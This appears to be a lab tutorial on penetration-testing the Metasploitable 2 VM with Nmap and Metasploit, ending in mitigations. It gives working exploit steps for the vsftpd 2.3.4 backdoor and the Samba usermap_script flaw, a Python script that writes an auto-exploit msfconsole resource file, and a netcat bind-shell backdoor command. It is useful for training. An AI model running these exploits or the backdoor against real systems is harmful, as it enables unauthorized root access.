Introduction
Penetration testing (pentesting) is an essential practice in cybersecurity: a security professional attacks a system the way an adversary would, to find and demonstrate exploitable weaknesses before a real attacker does. Metasploitable 2 is a deliberately vulnerable Linux virtual machine published by Rapid7 for penetration testing and ethical hacking practice. In this article, we will walk through a penetration test of Metasploitable using Kali Linux and the Metasploit Framework: scanning, exploitation, post-exploitation, and reporting.
Prerequisites
Before starting, ensure you have:
- Kali Linux installed (either as a virtual machine or on bare metal)
- Metasploitable 2 VM installed on VirtualBox or VMware
- Basic knowledge of Linux commands and networking
- Nmap and the Metasploit Framework (both are preinstalled in Kali Linux)
Step 1: Setting Up Metasploitable
- Download Metasploitable from https://sourceforge.net/projects/metasploitable/.
- Extract the .zip file and import the .vmdk file into VirtualBox or VMware.
- Assign a Host-Only Network or a Bridged Adapter so that Kali Linux and Metasploitable can reach each other. Host-only is the safer choice: the VM is intentionally exploitable and must never be reachable from an untrusted network.
- Start the Metasploitable VM and log in using the default credentials:
Username: msfadmin
Password: msfadmin
- Obtain the VM's IP address (normally on eth0) using:
ifconfig
Step 2: Scanning the Target with Nmap
Nmap is a powerful network scanning tool that helps identify open ports and running services.
Run the following command to scan the Metasploitable machine (-A enables version detection, OS detection, default NSE scripts and traceroute; -v shows progress). Nmap scans the 1000 most common ports by default, so add -p- if you want every port, and -oA <name> to save the results in all three output formats for later:
nmap -A -v <target-ip>
Example output:
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
This output lists the open ports and the services behind them. The version strings that -A adds (via -sV) are what you match against known vulnerabilities in the next step; an open port or a service name on its own is not evidence of a vulnerability.
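The scan-to-exploit mapping that Steps 2 and 3 do by hand, as an added Python example (not code from the article): it parses nmap's greppable output (a constructed sample modelled on Metasploitable 2 is embedded, so it runs offline), flags the services this guide exploits, and writes an msfconsole resource script. The host addresses are assumptions. The Samba rule uses exploit/multi/samba/usermap_script, the Metasploit module that matches the Samba 3.0.20 build on Metasploitable 2; the CVE identifiers in the rules are supplied here, not by the article.

```python
"""Turn an nmap -sV greppable scan into an msfconsole resource script for the modules used in this guide."""
import re
from dataclasses import dataclass

# Constructed sample, modelled on what `nmap -sV -oG scan.gnmap <target-ip>` writes for Metasploitable 2.
# nmap joins port records with ", " and writes each as port/state/proto/owner/service/rpcinfo/version/ ;
# a "/" inside a version string is replaced by "|" in this format.
SAMPLE_GNMAP = (
    "Host: 192.168.56.101 ()\tPorts: "
    "21/open/tcp//ftp//vsftpd 2.3.4/, "
    "22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)/, "
    "23/open/tcp//telnet//Linux telnetd/, "
    "80/open/tcp//http//Apache httpd 2.2.8 ((Ubuntu) DAV|2)/, "
    "139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X (workgroup: WORKGROUP)/, "
    "445/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X (workgroup: WORKGROUP)/, "
    "3306/open/tcp//mysql//MySQL 5.0.51a-3ubuntu5/\tIgnored State: closed (993)"
)

PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<state>[^/]*)/(?P<proto>[^/]*)/(?P<owner>[^/]*)/"
    r"(?P<service>[^/]*)/(?P<rpc>[^/]*)/(?P<version>[^/]*)/$"
)


@dataclass
class Service:
    host: str
    port: int
    proto: str
    name: str
    version: str


def parse_gnmap(text):
    """Return the open services from every 'Host:' line that carries a 'Ports:' field."""
    services = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for entry in re.split(r", (?=\d+/)", ports_field):   # split only in front of the next port number
            m = PORT_RE.match(entry.strip())
            if m and m["state"] == "open":
                services.append(Service(host, int(m["port"]), m["proto"], m["service"], m["version"]))
    return services


# (service name, version pattern, Metasploit module or None, note). The version string, not the service
# name, is the evidence: an "ftp" port only matters here if it is the backdoored vsftpd build.
RULES = (
    ("ftp", re.compile(r"vsftpd 2\.3\.4"), "exploit/unix/ftp/vsftpd_234_backdoor",
     "backdoored vsftpd release (CVE-2011-2523); root shell on TCP 6200"),
    ("netbios-ssn", re.compile(r"Samba smbd 3\."), "exploit/multi/samba/usermap_script",
     "Samba 3.0.20-3.0.25rc3 'username map script' injection (CVE-2007-2447); confirm the exact version first"),
    ("telnet", re.compile(r"."), None,
     "cleartext login; try the default msfadmin:msfadmin by hand"),
)


def match_rules(services):
    """Pair each service with the first matching rule, keeping one finding per (host, module)."""
    findings, seen = [], set()
    for svc in services:
        for name, version_re, module, note in RULES:
            if svc.name == name and version_re.search(svc.version):
                key = (svc.host, module)
                if module is not None and key in seen:
                    break
                seen.add(key)
                findings.append((svc, module, note))
                break
    return findings


def build_resource_script(findings, lhost):
    """Emit msfconsole commands; `exploit -z` backgrounds each new session instead of dropping into it."""
    lines = [f"setg LHOST {lhost}"]   # used by reverse payloads such as usermap_script's default
    for svc, module, note in findings:
        if module is None:
            lines.append(f"# {svc.host}:{svc.port} {svc.version}: {note} (no module queued)")
            continue
        lines += [f"# {svc.host}:{svc.port} {svc.version}: {note}",
                  f"use {module}", f"set RHOSTS {svc.host}", "exploit -z"]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # Usage: python3 nmap_to_rc.py > msfable.rc && msfconsole -r msfable.rc
    print(build_resource_script(match_rules(parse_gnmap(SAMPLE_GNMAP)), lhost="192.168.56.1"), end="")
```

Port 445 produces no second Samba entry because the module is queued once per host; the Telnet line is written as a comment only, since default credentials are checked by hand rather than with an exploit module.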
Step 3: Exploiting Vulnerabilities with Metasploit
1. Exploiting VSFTPD 2.3.4 Backdoor (Port 21)
The vsftpd 2.3.4 build on Metasploitable contains a backdoor (CVE-2011-2523) that was planted in the distributed source archive, not a bug in the program's design: logging in with a username that contains the sequence ":)" makes the daemon open a listener on TCP port 6200 that hands every connection a /bin/sh running as root. The Metasploit module below simply performs that login and connects to the listener.
Steps:
- Open Metasploit by typing:
msfconsole
- Search for the VSFTPD exploit:
search vsftpd
- Use the exploit module:
use exploit/unix/ftp/vsftpd_234_backdoor
- Set the target IP (older Metasploit releases call this option RHOST):
set RHOSTS <target-ip>
- Execute the exploit:
exploit
- If successful, you should receive a root shell. It is a raw command shell with no prompt, so confirm who you are:
whoami
root
2. Exploiting Telnet Service (Port 23)
Telnet is enabled on Metasploitable and accepts the VM's documented default credentials; the login banner itself advertises them. No exploit is needed here. Note that Telnet carries the credentials and the whole session in cleartext, so anyone on the network path can read them.
Steps:
- Connect to the Telnet service:
telnet <target-ip>
- Enter the default credentials:
Login: msfadmin
Password: msfadmin
- Once logged in, you have a shell as msfadmin. That account is in the admin group with unrestricted sudo, so root is one `sudo -i` away.
3. Exploiting Samba Service (Port 445) Using Metasploit
Samba on Metasploitable (3.0.20-Debian) is vulnerable to command injection through its "username map script" option (CVE-2007-2447): a username containing shell metacharacters is passed unescaped to the configured script, which smbd runs as root. MS08-067, which is sometimes named here, is a bug in the Windows Server service and does not apply to a Linux Samba host; the Metasploit module for this Samba flaw is exploit/multi/samba/usermap_script.
Steps:
- Search for the exploit:
search usermap_script
- Use the exploit module:
use exploit/multi/samba/usermap_script
- Set the target IP and, because the module's default payload is a reverse shell, the Kali address the target should connect back to:
set RHOSTS <target-ip>
set LHOST <kali-ip>
- Execute the exploit:
exploit
- If successful, you get a command shell running as root:
id
uid=0(root) gid=0(root)
Step 4: Post-Exploitation Activities
Once access is gained, various post-exploitation techniques can be performed. The vsftpd and Samba shells above are already root; the Telnet login is the unprivileged msfadmin account.
- Extract User Information:
cat /etc/passwd
- Check whether the current account can escalate to root:
sudo -l
- Create a Backdoor for Persistent Access (on Metasploitable the installed netcat-traditional supports -e):
netcat -lvp 4444 -e /bin/bash
This is an unauthenticated bind shell: anyone who can reach port 4444 gets the same root shell you have. It is acceptable only in an isolated lab. On a real engagement, any persistence must be agreed with the client beforehand, recorded in the report, and removed when the test ends.
Step 5: Reporting Findings and Mitigations
After performing the penetration test, document the findings, including:
- Vulnerabilities identified
- Exploits used
- Recommended mitigations (e.g., disabling unused services, applying patches, using strong credentials)
Example Mitigation Steps
- Disable Telnet and use SSH with key-based authentication.
- Update Samba to a supported release; the "username map script" injection was fixed in 3.0.25.
- Replace the backdoored vsftpd 2.3.4 build with a release whose checksum or signature has been verified, and in general install services only from signed distribution repositories.
- Restrict FTP access and disable anonymous login.
- Remove the default msfadmin credentials and any accounts that are not needed.
Conclusion
Metasploitable is a great platform for learning penetration testing in a controlled environment. In this guide, we covered:
- Scanning a target with Nmap
- Exploiting vulnerabilities using Metasploit
- Performing post-exploitation activities
- Mitigation strategies to secure the system
By practicing these techniques, security professionals can sharpen their ethical hacking skills and better understand how exposed services, default credentials and tampered software lead to full compromise. Always conduct penetration testing ethically and with written authorisation from the system owner.